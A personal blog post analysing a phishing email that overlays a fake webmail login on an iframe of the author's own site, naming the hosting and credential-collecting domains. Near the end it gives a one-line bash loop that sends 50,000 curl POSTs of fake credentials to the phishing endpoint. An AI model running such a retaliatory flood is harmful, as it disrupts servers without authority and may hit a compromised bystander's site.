f-log

just another web log

14 Sep 2024:
shocking jumpstation hacked-ish

Hacked-ish

Having had the jumpstation.co.uk domain from pre-2000s I get a lot of spam and I have seen most spam campaigns and techniques. This today made me sit up and pay attention.

I am a professional(*) and open these links in Virtual Machines. DO NOT TRY THIS AT HOME

Email source

Subject: Urgent! Email Removal Initiated!
Date: 13 Sep 2024 08:30:17 +0000
Reply-To: jumpstation.co.uk-Mailserver<noreply@jumpstation.co.uk>

Dear Email,

email@jumpstation.co.uk removal from server has been approved and initiated, Due to ignorance of last verification warning.

Removal will occur in exactly 48 hours from now 9/13/2024 8:30:17 a.m.

We recommend that you do any of the below and protect your mailbox and increase email security.

Continue Removal

Cancel Removal

jumpstation.co.uk Webmail Support

The Continue Removal and Cancel Removal links go to the same place.

But kudos on using noreply @ jumpstation.co.uk

The result of following that link was not what I expected.

My website HACKED !! (well, not really)

Screen shot of jumpstation domain in scam iframe

The url shows gateway.lighthouse.storage but that is my site showing!

In the HTML source they are just using an iframe to load my site and then add the modal over the top.

What is especially interesting is that use of the JUMPSTATION name and the favicon. If I had been not paying attention and this had gone to a work domain I had not used for a while then this might have been genuinely convincing.

The favicon is not downloaded by the enemy webserver, converted and served as an image. No, Google seems to have a service for that

https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://jumpstation.co.uk&size=16

The domain

Many many spam/scam emails I get have numerous redirects that bounce between compromised servers. This one was just uses gateway.lighthouse.storage .

I followed the root domain and reported it through their contact us form.

Conclusion

FYI the rendered scam web page is just one huge encoded string parsed through document.write

document.write(unescape('%3C%53% ... ')

Which seems to decode to be also more encoded Javascript. So ... as soon as anti-malware tools catch up to double encoding, the scammers will switch to triple encoding ??

Unsurprisingly entering your password in multiple times redirects to jumpstation.co.uk

The login data gets POSTed to https://huntanstongolfclub .com/icon/bomb.php but I was bored and didn't try investigate an further...

But I did bomb the bomb :D

for i in {1..50000}; do curl "https://huntanstongolfclub .com/icon/bomb.php" --data-raw "email=donald@whitehouse .gov&password=chumpette";done

Sometimes I will take more effort in spamming the spammers with more difficult to filter data.

Professional?

(*) Well not a professional to do with scam/spam, but I am a professional of something.

loading results, please wait loading animateloading animateloading animate
[More tags]
rss feed

email

root

flog archives


Disclaimer: This page is by me for me, if you are not me then please be aware of the following
I am not responsible for anything that works or does not work including files and pages made available at www.jumpstation.co.uk I am also not responsible for any information(or what you or others do with it) available at www.jumpstation.co.uk In fact I'm not responsible for anything ever, so there!